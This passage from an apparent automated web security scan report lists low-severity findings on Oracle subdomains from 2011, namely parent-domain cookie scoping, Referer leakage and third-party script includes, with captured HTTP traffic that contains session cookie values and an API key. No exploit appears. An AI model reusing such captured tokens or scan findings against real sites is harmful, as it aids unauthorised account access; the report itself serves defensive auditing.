
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/IrcVisitor.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OA_HTML/IrcVisitor.jsp HTTP/1.1
Host: irecruitment.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=aI-seAnN7gYCF5vKSizOZg..
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=7edb662ed98453aac9dc9b74d3c9b8937d8701988a5259b0428b92ef860b014a.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Set-Cookie: GSI=i3Mem4huzzTQAdgFWILWhbRGmk; domain=.oracle.com; path=/
Connection: Close
Content-Length: 774
Date: Mon, 17 Oct 2011 02:33:27 GMT
Set-Cookie: BIGipServergsiap_irecruitment_http=1527616141.5150.0000; path=/

<HTML><HEAD><TITLE>Redirect to https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW
...[SNIP]...

9.2. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oraclestore.oracle.com
Path:   /OA_HTML/ibeCAcpSSOLogin.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OA_HTML/ibeCAcpSSOLogin.jsp HTTP/1.1
Host: oraclestore.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://oraclestore.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCZzpHome.jsp&langCode=US
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=e777ccf7edc8301890cff82302c6164caa5fbe274fbcd6b64f26c589fd7e206f.e34Qb38Qax0Obi0La3mQaxaObNuNe0; path=/OA_HTML; secure
Set-Cookie: GSI=5vUCVsOLtQWWYgjwg5RgPqhXKQ; domain=.oracle.com; path=/
Set-Cookie: GSI_pses=ZG3E0DB19D7D744455D1A0925C59A3AD3C1FF690A1596002B149367678487AD7773EFC9EF14E0C8F8F29DEECE96E7F0713; expires=Fri, 16-Dec-2011 02:34:05 GMT; path=/OA_HTML
Connection: Close
Content-Length: 741
Date: Mon, 17 Oct 2011 02:34:04 GMT
Set-Cookie: BIGipServergsiap_store_http=1510838925.5150.0000; path=/

<HTML><HEAD><TITLE>Redirect to https://oraclestore.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore
...[SNIP]...

9.3. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oraclestore.oracle.com
Path:   /OA_HTML/ibeCZzpHome.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OA_HTML/ibeCZzpHome.jsp HTTP/1.1
Host: oraclestore.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: ibeCsZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSI=tqwrKmd4MpmUex7vEDNHntFYMv; domain=.oracle.com; path=/
Set-Cookie: GSI_pses=ZG36BBD0929B07C4DF99506769D66E5D4B8DBCA062B2F1A6DD61DE9A7BFE077AE9C90FADE45E3BCEAF4B4C29A29F35F171; expires=Fri, 16-Dec-2011 02:34:04 GMT; path=/OA_HTML
Connection: Close
Content-Length: 315
Date: Mon, 17 Oct 2011 02:34:04 GMT
Set-Cookie: BIGipServergsiap_store_http=3540882061.5150.0000; path=/

<HTML><HEAD><TITLE>Redirect to ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp</TITLE></HEAD><BODY><A HREF="ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTM
...[SNIP]...

10. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


10.1. http://apex.oracle.com/pls/otn/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apex.oracle.com
Path:   /pls/otn/f

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pls/otn/f?p=42988:3:4168696846582948::NO::: HTTP/1.1
Host: apex.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.oracle.com/us/corporate/contact/about-your-account-070507.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_CUSTOM-F_5924477525731666862_42988=339128DA72ED85F6; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318816293527; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fus%2Fcorporate%2Fcontact%2Fabout-your-account-070507.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fcorporate%25252Fcontact%25252Fabout-your-account-070507.html%2526pidt%253D1%2526oid%253Djavascript%25253AopenWindow('http%25253A%25252F%25252Fapex.oracle.com%25252Fpls%25252Fotn%25252Ff%25253Fp%25253D42988%25253A2'%25252C''%25252C'595'%25252C'435')%2526ot%253DA; BIGipServerapex-ext_oracle_com_http=1680380557.24862.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 01:51:15 GMT
Server: Oracle-Application-Server-11g
Content-Length: 13203
Content-Type: text/html; charset=UTF-8
Content-Language: en


<html lang="en-us" xmlns:htmldb="http://htmldb.oracle.com">
<head>
<title>External Account Help Form</title>
<link rel="stylesheet" href="/i/themes/theme_1/theme_V3.css" type="text/css" />

<link
...[SNIP]...
<input type="hidden" name="p_request" value="" id="pRequest" /><img border="0" src="http://www.oracleimg.com/us/assets/oralogo-small.gif"><table summary="" cellpadding="0" width="100%" cellspacing="0" border="0">
...[SNIP]...

10.2. http://events.oracle.com/search/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/search?group=Events&keyword=OPN+Only HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Oracle-DMS-ECID: 1362846513327523
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.4.0 (N;ecid=1362846513327523,0:1)
Date: Mon, 17 Oct 2011 02:33:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 163755


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.o
...[SNIP]...
</script>


<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=true"></script>
...[SNIP]...
<a class="legalese" onmouseover="panelMOv('evSearch','img1');" onmouseout="panelMOu('evSearch');" href="#">United States<img style="MARGIN-LEFT: 4px;" id="img1" border="0" alt="Change Country, Oracle Worldwide Web Sites" src= "http://www.oracleimg.com/ocom/groups/public/documents/digitalasset/dropdown-arrow-new.gif" /></a>
...[SNIP]...
<td class="tdClass"><a href="http://www.oraclestore.com/" class="text">Merchandise</a>
...[SNIP]...
<td width="616">
           <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
            codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0"
            width="616" height="200" id="unique_id" align="middle">

            <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<div class="icons" style="text-align: left;"><a href="http://twitter.com/oracleevents"><img src="searchui/images/markers/twitter_16x16.png" alt="twitter" height="16" width="16"></a><a href="http://twitter.com/oracleevents" target="_blank">Oracle Events on Twitter</a>
...[SNIP]...
</body>
<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0006/3948.js"> </script>
...[SNIP]...

11. Cross-domain script include  previous  next
There are 13 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


11.1. https://campus.oracle.com/campus/HR/aus_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/aus_main.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /campus/HR/aus_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:36 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:27:59 GMT
Accept-Ranges: bytes
Content-Length: 28699
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="linkedin_tab">
<script src="http://platform.linkedin.com/in.js" type="text/javascript">
api_key: z2c92hvkdwmw
</script>
...[SNIP]...

11.2. https://campus.oracle.com/campus/HR/cn_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/cn_main.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /campus/HR/cn_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:39 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:27:59 GMT
Accept-Ranges: bytes
Content-Length: 45746
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="linkedin_tab">
<script src="http://platform.linkedin.com/in.js" type="text/javascript">
api_key: z2c92hvkdwmw
</script>
...[SNIP]...

11.3. https://campus.oracle.com/campus/HR/india_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/india_main.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /campus/HR/india_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:39 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 29875
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="linkedin_tab">
<script src="http://platform.linkedin.com/in.js" type="text/javascript">
api_key: z2c92hvkdwmw
</script>
...[SNIP]...

11.4. https://campus.oracle.com/campus/HR/sg_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/sg_main.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /campus/HR/sg_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 27896
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="linkedin_tab">
<script src="http://platform.linkedin.com/in.js" type="text/javascript">
api_key: z2c92hvkdwmw
</script>
...[SNIP]...

11.5. http://crmondemand.oracle.com/en/index.htm.  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crmondemand.oracle.com
Path:   /en/index.htm.

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/index.htm. HTTP/1.1
Host: crmondemand.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:24:46 GMT
Cache-Control: no-cache
Content-type: text/html; charset=utf-8
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=66;ecid=50154525435839520,0:1)
Content-Length: 38334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_error.js"></script>
...[SNIP]...

11.6. http://events.oracle.com/search/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/search?group=Events&keyword=OPN+Only HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Oracle-DMS-ECID: 1362846513327523
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.4.0 (N;ecid=1362846513327523,0:1)
Date: Mon, 17 Oct 2011 02:33:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 163755


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.o
...[SNIP]...
</script>


<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=true"></script>
...[SNIP]...
</body>
<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0006/3948.js"> </script>
...[SNIP]...

11.7. http://solutions.oracle.com/home/basic_search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /home/basic_search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home/basic_search HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000

Response

HTTP/1.1 200 OK
Etag: "us, us"
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 17 Oct 2011 11:55:39 GMT
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=92538;ecid=122144739788,0)
Content-Length: 54845
Date: Mon, 17 Oct 2011 11:55:39 GMT
Content-Location: /servlet/page/home/basic_search

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
<script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"></script>
...[SNIP]...

11.8. http://solutions.oracle.com/portal/page/portal/auto_searches/browse_products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/page/portal/auto_searches/browse_products/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /portal/page/portal/auto_searches/browse_products/ HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://solutions.oracle.com/portal/page/portal/searchresults
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=http%3A//solutions.oracle.com/portal/page/portal/searchresults; gpw_e24=http%3A//solutions.oracle.com/portal/page/portal/searchresults; s_sq=oracleglobal%2Coraclesolutionscatalog%3D%2526pid%253DOPN%252520Solutions%252520Catalog%252520-%252520Search%252520Results%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//solutions.oracle.com/portal/page/portal/auto_searches/browse_products/%2526ot%253DA

Response

HTTP/1.1 200 OK
Etag: "us, us"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=22;ecid=117850466372,0)
Content-Length: 129198
Last-Modified: Mon, 17 Oct 2011 12:13:14 GMT
Date: Mon, 17 Oct 2011 12:13:14 GMT
Content-Location: /servlet/page/auto_searches/browse_products/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
<script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"></script>
...[SNIP]...

11.9. http://solutions.oracle.com/portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/ HTTP/1.1
Host: solutions.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Set-Cookie: portal=9.0.3+en-us+us+AMERICA+AF7668106FCC0F72E040578C52E12D0A+7943B303FA163202D6673E5F24FBB61634327EA4FEB2B4A1F07824F917876092D1847591CCF15B3BE6F7A2540EB84A7C2D6F5624EEEB23095C69E6C3D61A4BC19D4B600E16C9225DB13EA0533C1B1A11D3BAA48DF4E137C4; path=/
Connection: Close
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=449255;ecid=134994811307,0)
Content-Length: 160962
Date: Mon, 17 Oct 2011 02:35:02 GMT
Content-Location: /servlet/page/auto_searches/partners/specializations/applications/oracle_policy_automation/
Set-Cookie: BIGipServersolcat_pool=1292735117.25118.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
<script type="text/javascript" src="http://code.google.com/apis/gears/gears_init.js"></script>
...[SNIP]...

11.10. http://solutions.oracle.com/portal/page/portal/error  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/page/portal/error

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /portal/page/portal/error HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://solutions.oracle.com/portal/page/portal/searchresults
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Etag: "us, us"
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 17 Oct 2011 10:35:32 GMT
Cache-Control: max-age=0
